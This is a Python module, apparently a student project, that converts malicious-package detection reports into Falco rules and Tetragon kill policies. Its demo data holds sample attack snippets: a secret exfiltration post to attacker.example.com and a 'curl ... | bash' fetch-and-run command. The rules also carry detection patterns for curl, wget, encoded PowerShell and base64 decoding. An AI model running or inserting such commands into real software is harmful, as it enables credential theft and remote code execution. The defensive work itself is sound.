"""
Falco TracingPolicy / 일반 Falco rule 자동 생성기.

근거:
  - Falco rules YAML — https://falco.org/docs/rules/
  - Cilium Tetragon TracingPolicy — https://tetragon.io/docs/concepts/tracing-policy/

졸업과제 시연 흐름:
  우리 도구가 새 악성 패키지 발견 → 추출된 IoC (도메인, 실행 명령어,
  의심 syscall) 를 Falco/Tetragon 룰로 자동 생성 → 컨테이너 환경에서
  해당 IoC 발생 시 Falco 가 알림 / Tetragon 이 차단.

생성 가능한 룰:
  1. Falco macro + rule (alert only)
     - 알려진 악성 도메인으로의 outbound DNS / connect
     - 우리가 detect 한 exec command 실행 시
  2. Tetragon TracingPolicy (kernel-level enforcement)
     - 같은 syscall 후킹 + sigkill action
"""
from __future__ import annotations

import json
import os
import urllib.parse
from dataclasses import dataclass


# ─────────────── 헬퍼 ───────────────

def _extract_iocs(report: dict) -> dict[str, list[str]]:
    """report 의 evidence 와 advisory_summary 에서 IoC 추출."""
    domains: set[str] = set()
    ips: set[str] = set()
    commands: set[str] = set()

    # advisory 에 적힌 IoC
    pm = report.get("package_meta") or {}
    summary = pm.get("advisory_summary", "")

    # evidence 의 code_snippet 에서 도메인/명령어 추출
    for ev in report.get("evidence", []) or []:
        snippet = ev.get("code_snippet", "") or ""
        # 단순 추출 — URL/도메인
        import re
        for m in re.finditer(
            r"https?://([a-zA-Z0-9.\-]+)(?::\d+)?", snippet,
        ):
            domains.add(m.group(1))
        # bash command 류
        for m in re.finditer(
            r"(?:^|[\s'\"])(curl\s+\S+|wget\s+\S+|sh\s+-c\s+\S+|"
            r"powershell\s+\S+|/bin/bash\s+\S+)", snippet,
        ):
            commands.add(m.group(1)[:200])

    # advisory 에서도 추출
    import re
    for m in re.finditer(
        r"https?://([a-zA-Z0-9.\-]+)", summary,
    ):
        domains.add(m.group(1))

    return {
        "domains": sorted(domains),
        "ips": sorted(ips),
        "commands": sorted(commands),
    }


def _safe_id(*parts: str) -> str:
    raw = "-".join(parts).lower()
    return "".join(c if c.isalnum() or c == "-" else "-" for c in raw)[:60]


# ─────────────── Falco rule (YAML 직접 생성) ───────────────

def _yaml_escape(s: str) -> str:
    return s.replace("'", "''")


def to_falco_rules(report: dict) -> str:
    """report → Falco rules YAML 문자열.

    의존성 없이 직접 YAML 생성 (PyYAML 미설치도 OK).
    """
    pkg = report.get("package", "?")
    eco = report.get("ecosystem", "?")
    ver = report.get("version", "?")
    verdict = report.get("verdict", "ERROR")
    iocs = _extract_iocs(report)

    rules: list[str] = []
    rule_id_base = _safe_id("aislopsq", eco, pkg, ver)

    # 헤더
    rules.append("# Auto-generated by ai-slopsquatting/2.0")
    rules.append(f"# Source: {eco}/{pkg}@{ver} (verdict={verdict})")
    rules.append("")

    # macro: 악성 도메인 list
    if iocs["domains"]:
        domains_str = ", ".join(f"'{_yaml_escape(d)}'" for d in iocs["domains"][:50])
        rules.append(f"- macro: aislopsq_known_bad_domains_{rule_id_base}")
        rules.append(f"  condition: >")
        rules.append(f"    fd.sip.name in ({domains_str})")
        rules.append("")

        rules.append(f"- rule: AISLOPSQ Outbound to known-bad domain ({pkg})")
        rules.append(f"  desc: >")
        rules.append(
            f"    Connection to a domain associated with malicious package "
            f"{eco}/{pkg}@{ver} (verdict={verdict})."
        )
        rules.append(f"  condition: >")
        rules.append(
            f"    outbound and aislopsq_known_bad_domains_{rule_id_base}"
        )
        rules.append(f"  output: >")
        rules.append(
            f"    AISLOPSQ outbound connection to {pkg} IoC domain "
            f"(proc.cmdline=%proc.cmdline fd.name=%fd.name "
            f"container.id=%container.id)"
        )
        rules.append(f"  priority: WARNING")
        rules.append(f"  tags: [aislopsq, supply-chain, network]")
        rules.append("")

    # rule: 의심 명령어
    if iocs["commands"]:
        cmds_str = ", ".join(f"'{_yaml_escape(c)}'" for c in iocs["commands"][:30])
        rules.append(f"- rule: AISLOPSQ Suspicious exec ({pkg})")
        rules.append(f"  desc: >")
        rules.append(
            f"    Execution of command pattern observed in malicious package "
            f"{eco}/{pkg}@{ver}."
        )
        rules.append(f"  condition: >")
        rules.append(
            f"    spawned_process and "
            f"(proc.cmdline contains 'curl' or proc.cmdline contains 'wget' "
            f"or proc.cmdline contains 'powershell -e' "
            f"or proc.cmdline contains 'base64 -d')"
        )
        rules.append(f"  output: >")
        rules.append(
            f"    AISLOPSQ suspicious exec linked to {pkg} "
            f"(proc.cmdline=%proc.cmdline)"
        )
        rules.append(f"  priority: WARNING")
        rules.append(f"  tags: [aislopsq, supply-chain, exec]")
        rules.append("")

    if not iocs["domains"] and not iocs["commands"]:
        rules.append("# No extractable IoCs from this report")
        rules.append("# (no domains or commands found in evidence/snippets)")

    return "\n".join(rules)


# ─────────────── Tetragon TracingPolicy ───────────────

def to_tracing_policy(report: dict) -> str:
    """report → Cilium Tetragon TracingPolicy CRD YAML.

    syscall (connect, execve) hook + Sigkill action 포함 (kernel-level 차단).
    """
    pkg = report.get("package", "?")
    eco = report.get("ecosystem", "?")
    ver = report.get("version", "?")
    iocs = _extract_iocs(report)
    rule_id = _safe_id("aislopsq", eco, pkg, ver)

    # YAML 직접 — PyYAML 의존 없이
    lines = [
        "apiVersion: cilium.io/v1alpha1",
        "kind: TracingPolicy",
        "metadata:",
        f"  name: aislopsq-{rule_id}",
        "  labels:",
        "    aislopsq.io/source: ai-slopsquatting-detector",
        f"    aislopsq.io/verdict: {report.get('verdict','ERROR')}",
        f"    aislopsq.io/ecosystem: {eco}",
        f"    aislopsq.io/package: {_safe_id(pkg)}",
        "  annotations:",
        f"    aislopsq.io/source-ref: '{eco}/{pkg}@{ver}'",
        "spec:",
        "  kprobes:",
    ]

    # outbound connect 차단
    if iocs["domains"]:
        lines.append("  - call: tcp_connect")
        lines.append("    syscall: false")
        lines.append("    args:")
        lines.append("    - index: 0")
        lines.append("      type: sock")
        lines.append("    selectors:")
        lines.append("    - matchArgs:")
        lines.append("      - index: 0")
        lines.append("        operator: DAddr")
        lines.append("        values:")
        for d in iocs["domains"][:50]:
            lines.append(f"        - {d}")
        lines.append("      matchActions:")
        lines.append("      - action: Sigkill")
        lines.append("")

    # execve hook — curl/wget/powershell
    lines.append("  - call: __x64_sys_execve")
    lines.append("    syscall: true")
    lines.append("    args:")
    lines.append("    - index: 0")
    lines.append("      type: string")
    lines.append("    - index: 1")
    lines.append("      type: charbuf")
    lines.append("    selectors:")
    lines.append("    - matchArgs:")
    lines.append("      - index: 0")
    lines.append("        operator: Postfix")
    lines.append("        values:")
    lines.append("        - /curl")
    lines.append("        - /wget")
    lines.append("        - /powershell")
    lines.append("        - /bash")
    lines.append("      matchActions:")
    lines.append("      - action: Sigkill")

    return "\n".join(lines)


# ─────────────── Sink ───────────────

@dataclass
class FalcoPolicySink:
    """결과를 디스크에 저장하는 sink (kubectl apply 가능 형태)."""
    out_dir: str
    emit_falco: bool = True
    emit_tetragon: bool = True

    def emit(self, report: dict) -> dict:
        os.makedirs(self.out_dir, exist_ok=True)
        pkg = report.get("package", "x")
        eco = report.get("ecosystem", "x")
        ver = report.get("version", "x")
        base = _safe_id(eco, pkg, ver)

        out: dict = {}
        if self.emit_falco:
            falco_path = os.path.join(self.out_dir, f"{base}.falco.yaml")
            with open(falco_path, "w", encoding="utf-8") as f:
                f.write(to_falco_rules(report))
            out["falco"] = falco_path

        if self.emit_tetragon:
            tg_path = os.path.join(self.out_dir, f"{base}.tetragon.yaml")
            with open(tg_path, "w", encoding="utf-8") as f:
                f.write(to_tracing_policy(report))
            out["tetragon"] = tg_path

        return out


# ─────────────── CLI 데모 ───────────────

if __name__ == "__main__":
    rep = {
        "verdict": "MALICIOUS",
        "package": "evil-helpers",
        "ecosystem": "PyPI",
        "version": "0.0.1",
        "evidence": [{
            "code_snippet": "requests.post('https://attacker.example.com/exfil', data=secret)",
            "ttp_id": "T1041",
            "ttp_url": "https://attack.mitre.org/techniques/T1041/",
            "llm_reasoning": "credential exfil",
            "confidence": 0.92,
        }, {
            "code_snippet": "subprocess.run('curl http://evil.cdn/x.sh | bash', shell=True)",
            "ttp_id": "T1059",
            "ttp_url": "https://attack.mitre.org/techniques/T1059/",
            "llm_reasoning": "shell exec",
            "confidence": 0.85,
        }],
        "package_meta": {"advisory_summary":
                         "Sends to https://attacker.example.com/c2"},
    }
    print("=== Falco rules ===")
    print(to_falco_rules(rep))
    print("\n=== Tetragon TracingPolicy ===")
    print(to_tracing_policy(rep))
